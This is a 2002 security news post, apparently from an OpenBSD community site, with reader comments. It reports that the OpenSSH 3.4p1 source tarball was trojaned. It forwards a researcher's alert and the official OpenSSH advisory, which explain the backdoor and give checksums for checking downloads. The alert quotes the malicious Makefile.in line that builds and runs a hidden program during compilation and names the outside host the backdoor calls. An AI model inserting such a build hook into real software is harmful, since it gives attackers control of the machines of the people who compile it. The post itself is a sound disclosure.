openssh trojaned?

Contributed by jose on 2002-08-01 from the checksums-and-GPG dept.

Joshua Steele was the first of many to write to us with this story:

"Don't know if its worth anything, but there are some rumors on FreeBSD-security mailing list about openssh packages distributed from openssh.com and openbsd.org being trojaned.

UPDATE We have a copy of the OpenSSH note on the subject in the extended copy section. Thanks Rick, Niels.





FYI (I'm not on -security)

----- Forwarded message from Edwin Groothuis

-----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis


To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz


The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).
 
[1]
http://www.mavetju.org/~edwin/bf-test.c

[2]
http://www.mavetju.org/~edwin/bf-output.sh


This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

I have independently verified this story by fetching the OpenSSH-3.4p1 archive from the official site and then comparing it to the archive I pulled from a UK mirror . I generated the same files as discussed in this email.

This is why cryptographic checksums are good, GPG signatures are good, and the distfiles structure we have in the BSD ports tree is good.

The OpenSSH Note

From: Niels Provos

To: security-announce@openbsd.org, misc@openbsd.org,
        announce@openbsd.org
Subject: OpenSSH Security Advisory:  Trojaned Distribution Files
Date: Thu, 1 Aug 2002 11:19:49 -0400

OpenSSH Security Advisory (adv.trojan)

1. Systems affected:

OpenSSH version 3.2.2p1, 3.4p1 and 3.4 have been trojaned on the
OpenBSD ftp server and potentially propagated via the normal mirroring
process to other ftp servers.  The code was inserted some time between
the 30th and 31th of July.  We replaced the trojaned files with their
originals at 7AM MDT, August 1st.

2. Impact:

Anyone who has installed OpenSSH from the OpenBSD ftp server or any
mirror within that time frame should consider his system compromised.
The trojan allows the attacker to gain control of the system as the
user compiling the binary.  Arbitrary commands can be executed.

3. Solution:

Verify that you did not build a trojaned version of the sources.  The
portable SSH tar balls contain PGP signatures that should be verified
before installation.  You can also use the following MD5 checksums for
verification.

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
MD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c
MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2
MD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01
MD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a

4. Details

When building the OpenSSH binaries, the trojan resides in bf-test.c
and causes code to execute which connects to a specified IP address.
The destination port is normally used by the IRC protocol.  A
connection attempt is made once an hour.  If the connection is
successful, arbitrary commands may be executed.

Three commands are understood by the backdoor:

Command A:  Kill the exploit.
Command D:  Execute a command.
Command M:  Go to sleep.

5. Notice:

Because of the urgency of this issue, the advisory may not be
complete.  Updates will be posted to the OpenSSH web pages if
necessary.

(Comments are closed)

Comments

By Boubou () on 2002-08-01 14:02

Same story on ./

http://slashdot.org/articles/02/08/01/129228.shtml?tid=172
By Boubou () on 2002-08-01 14:36

Look like the (trojaned?) version are in openssh-3.4p1 portable & distfile.

The Story:
http://www.mavetju.org/weblog/weblog.php

--
Boubou - La curiosit� n'est pas un d�faut
ouf.org & b0ub0u.com
By Anonymous Coward () on 2002-08-01 17:35

Well, by coincidence I did a new v3.1 machine build with full patches last night, and sure enough on seeing all the alarm bells ringing this morning, I saw that I used a trojaned version of openssh-3.4.tgz. Oops...

To clear up the problem, is a simple rebuild/reinstall of an unaffected source sufficient?

Forensic reports on this are obviously still a bit incomplete, but various comments seem to suggest the trojan/daemon only runs during the compile/install process. Or did I get this wrong?

If so, then as I have suggested, a simple compile/install from clean source should be sufficient, right? Or is this a bit more insidious, and should I consider doing a full machine reinstall and patching?

Comments, anyone?

As in interim measure, I guess blocking all port 6667 activity is a possibility.
By Larry () on 2002-08-01 18:33

Is it safe to assume the CVS respositories were not affected and just ftp?
By Anonymous Coward () on 2002-08-01 18:38

Any information?
By Anonymous Coward () on 2002-08-02 00:14

This is a good example of the power of capabilities-based systems. Make shouldn't have the capability of making outgoing connections to irc ports, ever. sshd shouldn't make outgoing connections to anything, ever. That which shouldn't happen should be denied. That's why I think that OpenBSD's Systrace idea is so important. It is a step towards a capabilities-based system and if anyone was building openssh with systrace enabled, it would have stopped this trojan. It's another form of sandboxing, in other words, fault isolation, which is the future of OS security, IMHO.
Or maybe I'm just utterly paranoid.
Btw, if these guys weren't total lamers they would have used dns as a backchannel, not irc.
By Anonymous Coward () on 2002-08-04 08:29

I wonder who trojaned OpenSSH...
Big Corporate?
Industrial Espionage?
Goverenment Agencies?
Defense Department?
Illuminati?

Latest Articles

Thu, Apr 18
- 05:05 Coming soon to a -current system near you: parallel raw IP input (0)
Wed, Apr 17
- 05:33 In -current, default write format for tar(1) changed to "pax" (10)
Wed, Apr 10
- 18:50 OpenSMTPD 7.5.0p0 Released (2)
Tue, Apr 09
- 04:49 20 years since "and we're just starting": undeadly.org turns 20 (2024-04-09) (13)
Fri, Apr 05
- 06:16 OpenBSD 7.5 released (3)
Thu, Mar 28
- 18:18 LibreSSL 3.8.4 and 3.9.1 released (0)
Tue, Mar 12
- 06:53 OpenSSH 9.7/9.7p1 released! (0)
Mon, Mar 11
- 11:28 Game of Trees 0.97 released (0)
Sun, Mar 10
- 09:06 LibreSSL versions 3.8.3 and 3.9.0 released (0)

Credits

Copyright © 2004-2008 Daniel Hartmeier. All rights reserved. Articles and comments are copyright their respective authors, submission implies license to publish on this web site. Contents of the archive prior to April 2nd 2004 as well as images and HTML templates were copied from the fabulous original deadly.org with Jose's and Jim's kind permission. This journal runs as CGI with httpd(8) on OpenBSD, the source code is BSD licensed. undeadly \Un*dead"ly\, a. Not subject to death; immortal. [Obs.]